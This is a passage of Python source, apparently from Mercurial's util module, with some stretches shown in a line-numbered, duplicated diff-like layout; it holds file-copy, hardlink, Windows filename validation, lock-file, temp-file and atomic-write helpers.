    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember dest's stat so mtime ambiguity can be detected
            # after the copy replaces it
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # recreate the symlink rather than copying its target's content
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1155
1155
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    # progress topic depends on whether we ended up linking or copying
    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinking is only possible within a single device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            # offset child progress by the files already processed here
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed; copy this and all remaining files
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    # signal completion of this (sub)tree
    progress(topic, None)

    return hardlink, num
1195
1195
# base filenames (before the first dot) that Windows reserves for devices
_winreservednames = b'''con prn aux nul
com1 com2 com3 com4 com5 com6 com7 com8 com9
lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
# characters that may not appear anywhere in a Windows filename
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename("just/a/normal/path")
    >>> checkwinfilename("foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/xml.con")
    >>> checkwinfilename("foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename("foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename("../bar")
    >>> checkwinfilename("foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename("foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # examine every path component, whichever separator style is used
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            # control characters are never valid in Windows filenames
            if ord(c) <= 31:
                return _("filename contains %r, which is invalid "
                         "on Windows") % c
        # device names are reserved regardless of extension (con.xml)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1]
        # Windows silently drops a trailing dot or space; '.' and '..'
        # are allowed ('..' substring test covers both)
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1246
1246
if pycompat.osname == 'nt':
    checkosfilename = checkwinfilename
    # NOTE(review): time.clock presumably chosen for its higher
    # resolution on Windows -- confirm before changing
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# prefer the high-resolution counter when the interpreter provides it
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1256
1256
def makelock(info, pathname):
    # Preferred scheme: a symlink whose target *is* the lock content
    # (creation is atomic; readlock() reads it back via os.readlink).
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            # lock already held -- propagate so the caller handles it
            raise
        # any other symlink failure: fall through to the file scheme
    except AttributeError: # no symlink in os
        pass

    # fallback: exclusive creation of a regular file holding the info
    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)
1269
1269
1270 def readlock(pathname):
1270 def readlock(pathname):
1271 try:
1271 try:
1272 return os.readlink(pathname)
1272 return os.readlink(pathname)
1273 except OSError as why:
1273 except OSError as why:
1274 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1274 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1275 raise
1275 raise
1276 except AttributeError: # no symlink in os
1276 except AttributeError: # no symlink in os
1277 pass
1277 pass
1278 fp = posixfile(pathname)
1278 fp = posixfile(pathname)
1279 r = fp.read()
1279 r = fp.read()
1280 fp.close()
1280 fp.close()
1281 return r
1281 return r
1282
1282
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # no file descriptor available; stat by name instead
        return os.stat(fp.name)
    return os.fstat(fd)
1289
1289
1290 # File system features
1290 # File system features
1291
1291
1292 def fscasesensitive(path):
1292 def fscasesensitive(path):
1293 """
1293 """
1294 Return true if the given path is on a case-sensitive filesystem
1294 Return true if the given path is on a case-sensitive filesystem
1295
1295
1296 Requires a path (like /foo/.hg) ending with a foldable final
1296 Requires a path (like /foo/.hg) ending with a foldable final
1297 directory component.
1297 directory component.
1298 """
1298 """
1299 s1 = os.lstat(path)
1299 s1 = os.lstat(path)
1300 d, b = os.path.split(path)
1300 d, b = os.path.split(path)
1301 b2 = b.upper()
1301 b2 = b.upper()
1302 if b == b2:
1302 if b == b2:
1303 b2 = b.lower()
1303 b2 = b.lower()
1304 if b == b2:
1304 if b == b2:
1305 return True # no evidence against case sensitivity
1305 return True # no evidence against case sensitivity
1306 p2 = os.path.join(d, b2)
1306 p2 = os.path.join(d, b2)
1307 try:
1307 try:
1308 s2 = os.lstat(p2)
1308 s2 = os.lstat(p2)
1309 if s2 == s1:
1309 if s2 == s1:
1310 return False
1310 return False
1311 return True
1311 return True
1312 except OSError:
1312 except OSError:
1313 return True
1313 return True
1314
1314
# probe for the optional re2 bindings; _re2 stays None (undecided) until
# _re._checkre2() verifies that the module actually works (see issue3964)
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1320
1320
1321 class _re(object):
1321 class _re(object):
1322 def _checkre2(self):
1322 def _checkre2(self):
1323 global _re2
1323 global _re2
1324 try:
1324 try:
1325 # check if match works, see issue3964
1325 # check if match works, see issue3964
1326 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1326 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1327 except ImportError:
1327 except ImportError:
1328 _re2 = False
1328 _re2 = False
1329
1329
1330 def compile(self, pat, flags=0):
1330 def compile(self, pat, flags=0):
1331 '''Compile a regular expression, using re2 if possible
1331 '''Compile a regular expression, using re2 if possible
1332
1332
1333 For best performance, use only re2-compatible regexp features. The
1333 For best performance, use only re2-compatible regexp features. The
1334 only flags from the re module that are re2-compatible are
1334 only flags from the re module that are re2-compatible are
1335 IGNORECASE and MULTILINE.'''
1335 IGNORECASE and MULTILINE.'''
1336 if _re2 is None:
1336 if _re2 is None:
1337 self._checkre2()
1337 self._checkre2()
1338 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1338 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1339 if flags & remod.IGNORECASE:
1339 if flags & remod.IGNORECASE:
1340 pat = '(?i)' + pat
1340 pat = '(?i)' + pat
1341 if flags & remod.MULTILINE:
1341 if flags & remod.MULTILINE:
1342 pat = '(?m)' + pat
1342 pat = '(?m)' + pat
1343 try:
1343 try:
1344 return re2.compile(pat)
1344 return re2.compile(pat)
1345 except re2.error:
1345 except re2.error:
1346 pass
1346 pass
1347 return remod.compile(pat, flags)
1347 return remod.compile(pat, flags)
1348
1348
1349 @propertycache
1349 @propertycache
1350 def escape(self):
1350 def escape(self):
1351 '''Return the version of escape corresponding to self.compile.
1351 '''Return the version of escape corresponding to self.compile.
1352
1352
1353 This is imperfect because whether re2 or re is used for a particular
1353 This is imperfect because whether re2 or re is used for a particular
1354 function depends on the flags, etc, but it's the best we can do.
1354 function depends on the flags, etc, but it's the best we can do.
1355 '''
1355 '''
1356 global _re2
1356 global _re2
1357 if _re2 is None:
1357 if _re2 is None:
1358 self._checkre2()
1358 self._checkre2()
1359 if _re2:
1359 if _re2:
1360 return re2.escape
1360 return re2.escape
1361 else:
1361 else:
1362 return remod.escape
1362 return remod.escape
1363
1363
1364 re = _re()
1364 re = _re()
1365
1365
1366 _fspathcache = {}
1366 _fspathcache = {}
1367 def fspath(name, root):
1367 def fspath(name, root):
1368 '''Get name in the case stored in the filesystem
1368 '''Get name in the case stored in the filesystem
1369
1369
1370 The name should be relative to root, and be normcase-ed for efficiency.
1370 The name should be relative to root, and be normcase-ed for efficiency.
1371
1371
1372 Note that this function is unnecessary, and should not be
1372 Note that this function is unnecessary, and should not be
1373 called, for case-sensitive filesystems (simply because it's expensive).
1373 called, for case-sensitive filesystems (simply because it's expensive).
1374
1374
1375 The root should be normcase-ed, too.
1375 The root should be normcase-ed, too.
1376 '''
1376 '''
1377 def _makefspathcacheentry(dir):
1377 def _makefspathcacheentry(dir):
1378 return dict((normcase(n), n) for n in os.listdir(dir))
1378 return dict((normcase(n), n) for n in os.listdir(dir))
1379
1379
1380 seps = pycompat.ossep
1380 seps = pycompat.ossep
1381 if pycompat.osaltsep:
1381 if pycompat.osaltsep:
1382 seps = seps + pycompat.osaltsep
1382 seps = seps + pycompat.osaltsep
1383 # Protect backslashes. This gets silly very quickly.
1383 # Protect backslashes. This gets silly very quickly.
1384 seps.replace('\\','\\\\')
1384 seps.replace('\\','\\\\')
1385 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1385 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1386 dir = os.path.normpath(root)
1386 dir = os.path.normpath(root)
1387 result = []
1387 result = []
1388 for part, sep in pattern.findall(name):
1388 for part, sep in pattern.findall(name):
1389 if sep:
1389 if sep:
1390 result.append(sep)
1390 result.append(sep)
1391 continue
1391 continue
1392
1392
1393 if dir not in _fspathcache:
1393 if dir not in _fspathcache:
1394 _fspathcache[dir] = _makefspathcacheentry(dir)
1394 _fspathcache[dir] = _makefspathcacheentry(dir)
1395 contents = _fspathcache[dir]
1395 contents = _fspathcache[dir]
1396
1396
1397 found = contents.get(part)
1397 found = contents.get(part)
1398 if not found:
1398 if not found:
1399 # retry "once per directory" per "dirstate.walk" which
1399 # retry "once per directory" per "dirstate.walk" which
1400 # may take place for each patches of "hg qpush", for example
1400 # may take place for each patches of "hg qpush", for example
1401 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1401 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1402 found = contents.get(part)
1402 found = contents.get(part)
1403
1403
1404 result.append(found or part)
1404 result.append(found or part)
1405 dir = os.path.join(dir, part)
1405 dir = os.path.join(dir, part)
1406
1406
1407 return ''.join(result)
1407 return ''.join(result)
1408
1408
1409 def getfstype(dirpath):
1409 def getfstype(dirpath):
1410 '''Get the filesystem type name from a directory (best-effort)
1410 '''Get the filesystem type name from a directory (best-effort)
1411
1411
1412 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1412 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1413 '''
1413 '''
1414 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1414 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1415
1415
1416 def checknlink(testfile):
1416 def checknlink(testfile):
1417 '''check whether hardlink count reporting works properly'''
1417 '''check whether hardlink count reporting works properly'''
1418
1418
1419 # testfile may be open, so we need a separate file for checking to
1419 # testfile may be open, so we need a separate file for checking to
1420 # work around issue2543 (or testfile may get lost on Samba shares)
1420 # work around issue2543 (or testfile may get lost on Samba shares)
1421 f1 = testfile + ".hgtmp1"
1421 f1 = testfile + ".hgtmp1"
1422 if os.path.lexists(f1):
1422 if os.path.lexists(f1):
1423 return False
1423 return False
1424 try:
1424 try:
1425 posixfile(f1, 'w').close()
1425 posixfile(f1, 'w').close()
1426 except IOError:
1426 except IOError:
1427 try:
1427 try:
1428 os.unlink(f1)
1428 os.unlink(f1)
1429 except OSError:
1429 except OSError:
1430 pass
1430 pass
1431 return False
1431 return False
1432
1432
1433 f2 = testfile + ".hgtmp2"
1433 f2 = testfile + ".hgtmp2"
1434 fd = None
1434 fd = None
1435 try:
1435 try:
1436 oslink(f1, f2)
1436 oslink(f1, f2)
1437 # nlinks() may behave differently for files on Windows shares if
1437 # nlinks() may behave differently for files on Windows shares if
1438 # the file is open.
1438 # the file is open.
1439 fd = posixfile(f2)
1439 fd = posixfile(f2)
1440 return nlinks(f2) > 1
1440 return nlinks(f2) > 1
1441 except OSError:
1441 except OSError:
1442 return False
1442 return False
1443 finally:
1443 finally:
1444 if fd is not None:
1444 if fd is not None:
1445 fd.close()
1445 fd.close()
1446 for f in (f1, f2):
1446 for f in (f1, f2):
1447 try:
1447 try:
1448 os.unlink(f)
1448 os.unlink(f)
1449 except OSError:
1449 except OSError:
1450 pass
1450 pass
1451
1451
1452 def endswithsep(path):
1452 def endswithsep(path):
1453 '''Check path ends with os.sep or os.altsep.'''
1453 '''Check path ends with os.sep or os.altsep.'''
1454 return (path.endswith(pycompat.ossep)
1454 return (path.endswith(pycompat.ossep)
1455 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1455 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1456
1456
1457 def splitpath(path):
1457 def splitpath(path):
1458 '''Split path by os.sep.
1458 '''Split path by os.sep.
1459 Note that this function does not use os.altsep because this is
1459 Note that this function does not use os.altsep because this is
1460 an alternative of simple "xxx.split(os.sep)".
1460 an alternative of simple "xxx.split(os.sep)".
1461 It is recommended to use os.path.normpath() before using this
1461 It is recommended to use os.path.normpath() before using this
1462 function if need.'''
1462 function if need.'''
1463 return path.split(pycompat.ossep)
1463 return path.split(pycompat.ossep)
1464
1464
1465 def gui():
1465 def gui():
1466 '''Are we running in a GUI?'''
1466 '''Are we running in a GUI?'''
1467 if pycompat.sysplatform == 'darwin':
1467 if pycompat.sysplatform == 'darwin':
1468 if 'SSH_CONNECTION' in encoding.environ:
1468 if 'SSH_CONNECTION' in encoding.environ:
1469 # handle SSH access to a box where the user is logged in
1469 # handle SSH access to a box where the user is logged in
1470 return False
1470 return False
1471 elif getattr(osutil, 'isgui', None):
1471 elif getattr(osutil, 'isgui', None):
1472 # check if a CoreGraphics session is available
1472 # check if a CoreGraphics session is available
1473 return osutil.isgui()
1473 return osutil.isgui()
1474 else:
1474 else:
1475 # pure build; use a safe default
1475 # pure build; use a safe default
1476 return True
1476 return True
1477 else:
1477 else:
1478 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1478 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1479
1479
1480 def mktempcopy(name, emptyok=False, createmode=None):
1480 def mktempcopy(name, emptyok=False, createmode=None):
1481 """Create a temporary file with the same contents from name
1481 """Create a temporary file with the same contents from name
1482
1482
1483 The permission bits are copied from the original file.
1483 The permission bits are copied from the original file.
1484
1484
1485 If the temporary file is going to be truncated immediately, you
1485 If the temporary file is going to be truncated immediately, you
1486 can use emptyok=True as an optimization.
1486 can use emptyok=True as an optimization.
1487
1487
1488 Returns the name of the temporary file.
1488 Returns the name of the temporary file.
1489 """
1489 """
1490 d, fn = os.path.split(name)
1490 d, fn = os.path.split(name)
1491 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1491 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1492 os.close(fd)
1492 os.close(fd)
1493 # Temporary files are created with mode 0600, which is usually not
1493 # Temporary files are created with mode 0600, which is usually not
1494 # what we want. If the original file already exists, just copy
1494 # what we want. If the original file already exists, just copy
1495 # its mode. Otherwise, manually obey umask.
1495 # its mode. Otherwise, manually obey umask.
1496 copymode(name, temp, createmode)
1496 copymode(name, temp, createmode)
1497 if emptyok:
1497 if emptyok:
1498 return temp
1498 return temp
1499 try:
1499 try:
1500 try:
1500 try:
1501 ifp = posixfile(name, "rb")
1501 ifp = posixfile(name, "rb")
1502 except IOError as inst:
1502 except IOError as inst:
1503 if inst.errno == errno.ENOENT:
1503 if inst.errno == errno.ENOENT:
1504 return temp
1504 return temp
1505 if not getattr(inst, 'filename', None):
1505 if not getattr(inst, 'filename', None):
1506 inst.filename = name
1506 inst.filename = name
1507 raise
1507 raise
1508 ofp = posixfile(temp, "wb")
1508 ofp = posixfile(temp, "wb")
1509 for chunk in filechunkiter(ifp):
1509 for chunk in filechunkiter(ifp):
1510 ofp.write(chunk)
1510 ofp.write(chunk)
1511 ifp.close()
1511 ifp.close()
1512 ofp.close()
1512 ofp.close()
1513 except: # re-raises
1513 except: # re-raises
1514 try: os.unlink(temp)
1514 try: os.unlink(temp)
1515 except OSError: pass
1515 except OSError: pass
1516 raise
1516 raise
1517 return temp
1517 return temp
1518
1518
1519 class filestat(object):
1519 class filestat(object):
1520 """help to exactly detect change of a file
1520 """help to exactly detect change of a file
1521
1521
1522 'stat' attribute is result of 'os.stat()' if specified 'path'
1522 'stat' attribute is result of 'os.stat()' if specified 'path'
1523 exists. Otherwise, it is None. This can avoid preparative
1523 exists. Otherwise, it is None. This can avoid preparative
1524 'exists()' examination on client side of this class.
1524 'exists()' examination on client side of this class.
1525 """
1525 """
1526 def __init__(self, stat):
1526 def __init__(self, stat):
1527 self.stat = stat
1527 self.stat = stat
1528
1528
1529 @classmethod
1529 @classmethod
1530 def frompath(cls, path):
1530 def frompath(cls, path):
1531 try:
1531 try:
1532 stat = os.stat(path)
1532 stat = os.stat(path)
1533 except OSError as err:
1533 except OSError as err:
1534 if err.errno != errno.ENOENT:
1534 if err.errno != errno.ENOENT:
1535 raise
1535 raise
1536 stat = None
1536 stat = None
1537 return cls(stat)
1537 return cls(stat)
1538
1538
1539 @classmethod
1539 @classmethod
1540 def fromfp(cls, fp):
1540 def fromfp(cls, fp):
1541 stat = os.fstat(fp.fileno())
1541 stat = os.fstat(fp.fileno())
1542 return cls(stat)
1542 return cls(stat)
1543
1543
1544 __hash__ = object.__hash__
1544 __hash__ = object.__hash__
1545
1545
1546 def __eq__(self, old):
1546 def __eq__(self, old):
1547 try:
1547 try:
1548 # if ambiguity between stat of new and old file is
1548 # if ambiguity between stat of new and old file is
1549 # avoided, comparison of size, ctime and mtime is enough
1549 # avoided, comparison of size, ctime and mtime is enough
1550 # to exactly detect change of a file regardless of platform
1550 # to exactly detect change of a file regardless of platform
1551 return (self.stat.st_size == old.stat.st_size and
1551 return (self.stat.st_size == old.stat.st_size and
1552 self.stat.st_ctime == old.stat.st_ctime and
1552 self.stat.st_ctime == old.stat.st_ctime and
1553 self.stat.st_mtime == old.stat.st_mtime)
1553 self.stat.st_mtime == old.stat.st_mtime)
1554 except AttributeError:
1554 except AttributeError:
1555 pass
1555 pass
1556 try:
1556 try:
1557 return self.stat is None and old.stat is None
1557 return self.stat is None and old.stat is None
1558 except AttributeError:
1558 except AttributeError:
1559 return False
1559 return False
1560
1560
1561 def isambig(self, old):
1561 def isambig(self, old):
1562 """Examine whether new (= self) stat is ambiguous against old one
1562 """Examine whether new (= self) stat is ambiguous against old one
1563
1563
1564 "S[N]" below means stat of a file at N-th change:
1564 "S[N]" below means stat of a file at N-th change:
1565
1565
1566 - S[n-1].ctime < S[n].ctime: can detect change of a file
1566 - S[n-1].ctime < S[n].ctime: can detect change of a file
1567 - S[n-1].ctime == S[n].ctime
1567 - S[n-1].ctime == S[n].ctime
1568 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1568 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1569 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1569 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1570 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1570 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1571 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1571 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1572
1572
1573 Case (*2) above means that a file was changed twice or more at
1573 Case (*2) above means that a file was changed twice or more at
1574 same time in sec (= S[n-1].ctime), and comparison of timestamp
1574 same time in sec (= S[n-1].ctime), and comparison of timestamp
1575 is ambiguous.
1575 is ambiguous.
1576
1576
1577 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1577 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1578 timestamp is ambiguous".
1578 timestamp is ambiguous".
1579
1579
1580 But advancing mtime only in case (*2) doesn't work as
1580 But advancing mtime only in case (*2) doesn't work as
1581 expected, because naturally advanced S[n].mtime in case (*1)
1581 expected, because naturally advanced S[n].mtime in case (*1)
1582 might be equal to manually advanced S[n-1 or earlier].mtime.
1582 might be equal to manually advanced S[n-1 or earlier].mtime.
1583
1583
1584 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1584 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1585 treated as ambiguous regardless of mtime, to avoid overlooking
1585 treated as ambiguous regardless of mtime, to avoid overlooking
1586 by confliction between such mtime.
1586 by confliction between such mtime.
1587
1587
1588 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1588 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1589 S[n].mtime", even if size of a file isn't changed.
1589 S[n].mtime", even if size of a file isn't changed.
1590 """
1590 """
1591 try:
1591 try:
1592 return (self.stat.st_ctime == old.stat.st_ctime)
1592 return (self.stat.st_ctime == old.stat.st_ctime)
1593 except AttributeError:
1593 except AttributeError:
1594 return False
1594 return False
1595
1595
1596 def avoidambig(self, path, old):
1596 def avoidambig(self, path, old):
1597 """Change file stat of specified path to avoid ambiguity
1597 """Change file stat of specified path to avoid ambiguity
1598
1598
1599 'old' should be previous filestat of 'path'.
1599 'old' should be previous filestat of 'path'.
1600
1600
1601 This skips avoiding ambiguity, if a process doesn't have
1601 This skips avoiding ambiguity, if a process doesn't have
1602 appropriate privileges for 'path'. This returns False in this
1602 appropriate privileges for 'path'. This returns False in this
1603 case.
1603 case.
1604
1604
1605 Otherwise, this returns True, as "ambiguity is avoided".
1605 Otherwise, this returns True, as "ambiguity is avoided".
1606 """
1606 """
1607 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1607 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1608 try:
1608 try:
1609 os.utime(path, (advanced, advanced))
1609 os.utime(path, (advanced, advanced))
1610 except OSError as inst:
1610 except OSError as inst:
1611 if inst.errno == errno.EPERM:
1611 if inst.errno == errno.EPERM:
1612 # utime() on the file created by another user causes EPERM,
1612 # utime() on the file created by another user causes EPERM,
1613 # if a process doesn't have appropriate privileges
1613 # if a process doesn't have appropriate privileges
1614 return False
1614 return False
1615 raise
1615 raise
1616 return True
1616 return True
1617
1617
1618 def __ne__(self, other):
1618 def __ne__(self, other):
1619 return not self == other
1619 return not self == other
1620
1620
1621 class atomictempfile(object):
1621 class atomictempfile(object):
1622 '''writable file object that atomically updates a file
1622 '''writable file object that atomically updates a file
1623
1623
1624 All writes will go to a temporary copy of the original file. Call
1624 All writes will go to a temporary copy of the original file. Call
1625 close() when you are done writing, and atomictempfile will rename
1625 close() when you are done writing, and atomictempfile will rename
1626 the temporary copy to the original name, making the changes
1626 the temporary copy to the original name, making the changes
1627 visible. If the object is destroyed without being closed, all your
1627 visible. If the object is destroyed without being closed, all your
1628 writes are discarded.
1628 writes are discarded.
1629
1629
1630 checkambig argument of constructor is used with filestat, and is
1630 checkambig argument of constructor is used with filestat, and is
1631 useful only if target file is guarded by any lock (e.g. repo.lock
1631 useful only if target file is guarded by any lock (e.g. repo.lock
1632 or repo.wlock).
1632 or repo.wlock).
1633 '''
1633 '''
1634 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1634 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1635 self.__name = name # permanent name
1635 self.__name = name # permanent name
1636 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1636 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1637 createmode=createmode)
1637 createmode=createmode)
1638 self._fp = posixfile(self._tempname, mode)
1638 self._fp = posixfile(self._tempname, mode)
1639 self._checkambig = checkambig
1639 self._checkambig = checkambig
1640
1640
1641 # delegated methods
1641 # delegated methods
1642 self.read = self._fp.read
1642 self.read = self._fp.read
1643 self.write = self._fp.write
1643 self.write = self._fp.write
1644 self.seek = self._fp.seek
1644 self.seek = self._fp.seek
1645 self.tell = self._fp.tell
1645 self.tell = self._fp.tell
1646 self.fileno = self._fp.fileno
1646 self.fileno = self._fp.fileno
1647
1647
1648 def close(self):
1648 def close(self):
1649 if not self._fp.closed:
1649 if not self._fp.closed:
1650 self._fp.close()
1650 self._fp.close()
1651 filename = localpath(self.__name)
1651 filename = localpath(self.__name)
1652 oldstat = self._checkambig and filestat.frompath(filename)
1652 oldstat = self._checkambig and filestat.frompath(filename)
1653 if oldstat and oldstat.stat:
1653 if oldstat and oldstat.stat:
1654 rename(self._tempname, filename)
1654 rename(self._tempname, filename)
1655 newstat = filestat.frompath(filename)
1655 newstat = filestat.frompath(filename)
1656 if newstat.isambig(oldstat):
1656 if newstat.isambig(oldstat):
1657 # stat of changed file is ambiguous to original one
1657 # stat of changed file is ambiguous to original one
1658 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1658 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1659 os.utime(filename, (advanced, advanced))
1659 os.utime(filename, (advanced, advanced))
1660 else:
1660 else:
1661 rename(self._tempname, filename)
1661 rename(self._tempname, filename)
1662
1662
1663 def discard(self):
1663 def discard(self):
1664 if not self._fp.closed:
1664 if not self._fp.closed:
1665 try:
1665 try:
1666 os.unlink(self._tempname)
1666 os.unlink(self._tempname)
1667 except OSError:
1667 except OSError:
1668 pass
1668 pass
1669 self._fp.close()
1669 self._fp.close()
1670
1670
1671 def __del__(self):
1671 def __del__(self):
1672 if safehasattr(self, '_fp'): # constructor actually did something
1672 if safehasattr(self, '_fp'): # constructor actually did something
1673 self.discard()
1673 self.discard()
1674
1674
1675 def __enter__(self):
1675 def __enter__(self):
1676 return self
1676 return self
1677
1677
1678 def __exit__(self, exctype, excvalue, traceback):
1678 def __exit__(self, exctype, excvalue, traceback):
1679 if exctype is not None:
1679 if exctype is not None:
1680 self.discard()
1680 self.discard()
1681 else:
1681 else:
1682 self.close()
1682 self.close()
1683
1683
1684 def unlinkpath(f, ignoremissing=False):
1684 def unlinkpath(f, ignoremissing=False):
1685 """unlink and remove the directory if it is empty"""
1685 """unlink and remove the directory if it is empty"""
1686 if ignoremissing:
1686 if ignoremissing:
1687 tryunlink(f)
1687 tryunlink(f)
1688 else:
1688 else:
1689 unlink(f)
1689 unlink(f)
1690 # try removing directories that might now be empty
1690 # try removing directories that might now be empty
1691 try:
1691 try:
1692 removedirs(os.path.dirname(f))
1692 removedirs(os.path.dirname(f))
1693 except OSError:
1693 except OSError:
1694 pass
1694 pass
1695
1695
1696 def tryunlink(f):
1696 def tryunlink(f):
1697 """Attempt to remove a file, ignoring ENOENT errors."""
1697 """Attempt to remove a file, ignoring ENOENT errors."""
1698 try:
1698 try:
1699 unlink(f)
1699 unlink(f)
1700 except OSError as e:
1700 except OSError as e:
1701 if e.errno != errno.ENOENT:
1701 if e.errno != errno.ENOENT:
1702 raise
1702 raise
1703
1703
1704 def makedirs(name, mode=None, notindexed=False):
1704 def makedirs(name, mode=None, notindexed=False):
1705 """recursive directory creation with parent mode inheritance
1705 """recursive directory creation with parent mode inheritance
1706
1706
1707 Newly created directories are marked as "not to be indexed by
1707 Newly created directories are marked as "not to be indexed by
1708 the content indexing service", if ``notindexed`` is specified
1708 the content indexing service", if ``notindexed`` is specified
1709 for "write" mode access.
1709 for "write" mode access.
1710 """
1710 """
1711 try:
1711 try:
1712 makedir(name, notindexed)
1712 makedir(name, notindexed)
1713 except OSError as err:
1713 except OSError as err:
1714 if err.errno == errno.EEXIST:
1714 if err.errno == errno.EEXIST:
1715 return
1715 return
1716 if err.errno != errno.ENOENT or not name:
1716 if err.errno != errno.ENOENT or not name:
1717 raise
1717 raise
1718 parent = os.path.dirname(os.path.abspath(name))
